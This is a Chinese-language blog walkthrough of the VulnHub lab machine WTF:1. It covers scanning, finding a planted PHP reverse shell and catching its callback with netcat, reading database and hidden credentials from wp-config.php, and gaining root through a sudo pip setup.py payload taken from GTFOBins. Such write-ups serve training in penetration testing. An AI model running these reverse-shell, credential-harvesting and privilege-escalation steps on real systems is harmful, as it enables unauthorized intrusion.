vulnhub靶机渗透[WTF-1]

Posted on Edited on In Views: Word count in article: 2.1k Reading time ≈ 8 mins.

名称:WTF:1
发布日期:2019年11月22日

下载:

  • Download: https://mega.nz/#!dmZGDQRa!eiUQN_w_qZODlonwe8RM5WsOHFrpi3wqIyFfVc2DyU0
  • Download (Mirror): https://download.vulnhub.com/wtf/wtf.rar
  • Download (Torrent): https://download.vulnhub.com/wtf/wtf.rar.torrent

描述:
初学者-中级机器,您的目标是获取/root/flag.txt。
记住,很好的列举!基于VMware,您可能会遇到VB问题。

网络配置

一开始安装虚拟机打开的时候会遇到描述中所说的获取不到ip的现象参考文章Vulnhub靶机检测不到IP地址,这篇文章写的很详细,不用我多说,自己看着一步步配置就行。

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.134
Host is up (0.00017s latency).
MAC Address: 00:0C:29:CA:25:F7 (VMware)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~# nmap -sS -sV -T5 -A -p- -v --script=vuln 192.168.142.134
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.38 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.38: 
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-10097  6.0     https://vulners.com/cve/CVE-2019-10097
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-0215   6.0     https://vulners.com/cve/CVE-2019-0215
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|_      CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092

开了22和80两个端口

下载github上评分22.1k的seclists字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~# apt -y install seclists
正在读取软件包列表... 完成
正在分析软件包的依赖关系树       
正在读取状态信息... 完成       
下列软件包是自动安装的并且现在不需要了:
  apt-file command-not-found libapt-pkg-perl libexporter-tiny-perl libisl21 libjim0.77
  liblist-moreutils-perl libregexp-assemble-perl
使用'apt autoremove'来卸载它(它们)。
下列【新】软件包将被安装:
  seclists
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。
需要下载 276 MB 的归档。
解压缩后会消耗 1,033 MB 的额外空间。
获取:1 https://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 seclists all 2019.4-0kali2 [276 MB]
已下载 276 MB,耗时 45秒 (6,170 kB/s)                                                                 
正在选中未选择的软件包 seclists。
(正在读取数据库 ... 系统当前共安装有 318480 个文件和目录。)
准备解压 .../seclists_2019.4-0kali2_all.deb  ...
正在解压 seclists (2019.4-0kali2) ...
正在设置 seclists (2019.4-0kali2) ...

gobuster扫一波发现zhkh目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:~# gobuster dir --url http://192.168.142.134/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.142.134/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/24 00:34:22 Starting gobuster
===============================================================
/javascript (Status: 301)
/server-status (Status: 403)
[ERROR] 2019/12/24 00:34:24 [!] parse http://192.168.142.134/error_log: net/url: invalid control character in URL
/zhkh (Status: 301)
===============================================================
2019/12/24 00:34:27 Finished
===============================================================

访问http://192.168.142.134/zhkh/发现是wordpress5.3版本程序搭建的

burp添加规则如下图所示即可访问完整的正常页面

爆破后台密码和寻找wordpress漏洞无果之后下一步操作

由于提示good enumeration,进入wp-content/uploads/目录下有新发现shell.php

访问shell.php出现错误提示

1
WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111)

看错误得知是php-reverse-shell,就是反弹shell的php木马

用wireshark抓包查看php-reverse-shell请求的ip和端口以便于nc后续本地监听需要

得知请求ip为192.168.1.14,端口为5555

getshell

NAT模式的网络配置改成192.168.1.0/24,之后给kali配置一个静态IP 192.168.1.14,然后重启kali和wtf靶机,访问php-reverse-shell

成功弹回shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~# nc -lvp 5555
listening on [any] 5555 ...
192.168.1.15: inverse host lookup failed: Unknown host
connect to [192.168.1.14] from (UNKNOWN) [192.168.1.15] 47192
Linux wtf 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
 01:56:54 up 1 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@wtf:/$ ls
ls
bin   home            lib32       media  root  sys  vmlinuz
boot  initrd.img      lib64       mnt    run   tmp  vmlinuz.old
dev   initrd.img.old  libx32      opt    sbin  usr
etc   lib             lost+found  proc   srv   var

提权

查看SUID权限可执行文件,没有可用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@wtf:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/su
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

sudo -l又需要输入密码

进入/var/www/html/zhkh目录查看wp-config.php文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
www-data@wtf:/var/www/html/zhkh$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_database' );

/** MySQL database username */
define( 'DB_USER', 'ra' );

/** MySQL database password */
define( 'DB_PASSWORD', '912391929129' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'hmdNSrpLV5we) E$0_/E,$Vxr0%<S{]D@)T+rc%a7wvbr)Q|bm7boJdOz/AN>/#&' );
define( 'SECURE_AUTH_KEY',  'DR&l3>0z8mmFT+Y}#bqND_~H;wb[r|:te+tN%:K PS7=~~/;uA5)zj~Z%tu}-8UJ' );
define( 'LOGGED_IN_KEY',    '7+cns%lA?p60U~*(J,z9zp4w 2%hB1S6jZ0NuUgl(oK,#H6&GL,i@+4m:1w3|-aW' );
define( 'NONCE_KEY',        'm5,d=I4 MShd4lU#8F@@oj2cKpc+J[Kp3bRt%Sfuw.%#`oVKzgDMTl5+D[nu,R<K' );
define( 'AUTH_SALT',        'sl3w_.}n|M{~D#6,v]U?Kz/,k&oCnn1._|(i3Y|ng7+<-f4Nv7mmR4B<i>!?du#i' );
define( 'SECURE_AUTH_SALT', 'b>,[La8I5xqchTMvXN-bI8%[)-V[wHjNmj/1jZ_Vnq`q0<|E@6^.8~KpI_#53Rw_' );
define( 'LOGGED_IN_SALT',   'v_`E=EA]$UBa.2P|%YV4cl}(c@AVkW$V5959/gQL~a:,O}qfG85Xc4)=xRBux6g?' );
define( 'NONCE_SALT',       'TE#Tim,4h|zKYm$he[F%J*4vG{v]VK!jP0sSeBLHp7Mp|P*XJz:=&n<nsfbIFq>a' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

//`Db]f{He3HgO`(z

将其中的ra/912391929129连接ssh发现连接不上,再将ra/Db]f{He3HgO(z连接ssh,成功登录,真想说一句what the fuck!!!!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@kali:~# ssh ra@192.168.1.15
The authenticity of host '192.168.1.15 (192.168.1.15)' can't be established.
ECDSA key fingerprint is SHA256:YRICww0bKH3fcEIycw4x9iWEv3gF1qtqElE7ecocCn8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.15' (ECDSA) to the list of known hosts.
ra@192.168.1.15's password: 
Linux wtf 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 21 12:47:56 2019 from 192.168.1.13
ra@wtf:~$ ls
ra@wtf:~$ id
uid=1000(ra) gid=1000(ra) groups=1000(ra),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
ra@wtf:~$ pwd
/home/ra
ra@wtf:~$ whoami
ra
ra@wtf:~$ ls -la
total 28
drwxr-xr-x 3 ra   ra   4096 Nov 21 15:04 .
drwxr-xr-x 3 root root 4096 Nov 21 06:45 ..
-rw------- 1 ra   ra    480 Nov 21 15:01 .bash_history
-rw-r--r-- 1 ra   ra    220 Nov 21 06:45 .bash_logout
-rw-r--r-- 1 ra   ra   3526 Nov 21 06:45 .bashrc
drwx------ 3 ra   ra   4096 Nov 21 14:18 .gnupg
-rw-r--r-- 1 ra   ra    807 Nov 21 06:45 .profile
ra@wtf:~$
1
2
3
4
5
6
7
ra@wtf:~$ sudo -l
Matching Defaults entries for ra on wtf:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ra may run the following commands on wtf:
    (root) NOPASSWD: /usr/bin/pip

发现/usr/bin/pip可以以root用户的权限执行,网上搜索利用方法,传送门GTFOBins

1
2
3
4
5
6
7
8
9
ra@wtf:~$ TF=$(mktemp -d)
ra@wtf:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
ra@wtf:~$ sudo pip install $TF
Processing /tmp/tmp.FbYhS1oIjc
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#

运行poc后成功提权,然后找到flag

1
2
3
4
5
6
7
8
# cd /root
# ls
flag.txt
# cat flag.txt
WTF rooted!
haha, well done. 
You can find me on discord to tell me your opinion about "WTF" -> pwn4magic#8707
#

帅的掉渣

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…